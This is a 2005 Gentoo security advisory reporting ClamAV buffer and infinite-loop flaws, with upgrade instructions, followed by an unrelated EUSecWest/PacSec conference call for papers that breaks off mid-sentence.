- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200511-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: ClamAV: Multiple vulnerabilities Date: November 06, 2005 Bugs: #109213 ID: 200511-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ClamAV has many security flaws which make it vulnerable to remote execution of arbitrary code and a Denial of Service. Background == ClamAV is a GPL anti-virus toolkit, designed for integration with mail servers to perform attachment scanning. ClamAV also provides a command line scanner and a tool for fetching updates of the virus database. Affected packages = --- Package / Vulnerable / Unaffected --- 1 app-antivirus/clamav < 0.87.1 >= 0.87.1 Description === ClamAV has multiple security flaws: a boundary check was performed incorrectly in petite.c, a buffer size calculation in unfsg_133 was incorrect in fsg.c, a possible infinite loop was fixed in tnef.c and a possible infinite loop in cabd_find was fixed in cabd.c . In addition to this, Marcin Owsiany reported that a corrupted DOC file causes a segmentation fault in ClamAV. Impact == By sending a malicious attachment to a mail server that is hooked with ClamAV, a remote attacker could cause a Denial of Service or the execution of arbitrary code. Workaround == There is no known workaround at this time. Resolution == All ClamAV users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-antivirus/clamav-0.87.1" References == [ 1 ] CAN-2005-3239 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3239 [ 2 ] CAN-2005-3303 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3303 [ 3 ] ClamAV release notes http://sourceforge.net/project/shownotes.php?release_id=368319 [ 4 ] Zero Day Initiative advisory http://www.zerodayinitiative.com/advisories/ZDI-05-002.html Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200511-04.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2005 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.0 pgpDoG7KccR8S.pgp Description: PGP signature
EUSecWest/London Call for Papers and PacSec/Tokyo announcements
url: http://eusecwest.com url: http://pacsec.jp (PacSec/Tokyo Announcement below...) EUSecWest/core06 CALL FOR PAPERS London Security Summit February 20/21 2006 LONDON, United Kingdom -- Applied technical security will be the focus of a new annual conference from the organizers of CanSecWest, and PacSec, which is sponsored by the U.K. government CESG - where the eminent figures in the international security industry will get together with leading European researchers to share best practices and technology. The most significant new discoveries about computer network hack attacks and defenses, commercial security solutions, and pragmatic real world security experience will be presented in central London at the Victoria Park Plaza hotel on February 20 and 21. The EUSecWest meeting provides international researchers a relaxed, comfortable environment to learn from informative tutorials on key developments in security technology, and to collaborate and socialize with their peers in one of the world's hubs of IT activity - downtown London. In addition to the usual one hour tutorials, panel sessions and highly entertaining 5 minute "lightning" talks, this conference will also feature a new session called "Elevator Focus Groups". Featuring several short sessions, these commercial presentations will showcase new, significantly used, or dramatically innovative products in the information security realm. Each selected vendor will have a short 10 minute presentation ("elevator pitch"), after which 10 minutes of audience Q&A and interactive discussion amongst the expert security practitioners attending will follow. In this session both the audience and the vendors can get valuable feedback from world leading experts. The attendees can get user evaluations and learn from sharing experiences about real world security applications and the practical uses of the products - the "focus group." Hence the name: Elevator Focus Groups. The EUSecWest conference will also feature the availability of the Security Masters Dojo expert network security sensei instructors, and their advanced, and intermediate, hands-on training courses - featuring small class sizes and practical application excercises to maximize information transfer. We would like to announce the opportunity to submit papers, lightning talk proposals, and elevator focus candidate products for selection by the EUSecWest technical review committee. Please make your proposal submissions before December 1st 2006. Slides for the papers must be submitted by February 1st 2006. Some invited papers have been confirmed, but a limited number of speaking slots are still available. The conference is responsible for travel and accomodations for the speakers. If you have a proposal for a tutorial session then please email a synopsis of the material and your biography, papers and, speaking background to [EMAIL PROTECTED] Only slides will be needed for the February paper deadline, full text does not have to be submitted. The EUSecWest/core06 conference consists of tutorials on technical details about current issues, innovative techniques and best practices in the information security realm. The audiences are a multi-national mix of professionals involved on a daily basis with security work: security product vendors, programmers, security officers, and network administrators. We give preference to technical details and new education for a technical audience. The conference itself is a single track series of presentations in a lecture theater environment. The presentations offer speakers the opportunity to showcase on-going research and collaborate with peers while educating and highlighting advancements in security products and techniques. The focus is on innovation, tutorials, and education instead of product pitches. Some commercial content is tolerated, but it needs to be backed up by a technical presenter - either giving a valuable tutorial and best practices instruction or detailing significant new technology in the products. Paper proposals should consist of the following information: 1) Presenter, and geographical location (country of origin/passport) and contact info (e-mail, postal address, phone, fax). 2) Employer and/or affiliations. 3) Brief biography, list of publications and papers. 4) Any significant presentation and educational experience/background. 5) Topic synopsis, Proposed paper title, and a one paragraph description. 6) Reason why this material is innovative or significant or an important tutorial. 7) Optionally, any samples of prepared material or outlines ready. Please include the plain text version of this information in your email as well as any file, pdf, or html attachments. Please forward the above information to [EMAIL PROTECTED] to be considered for placement on the speaker roster, have your lightning talk scheduled, or submit your product for inclusion in th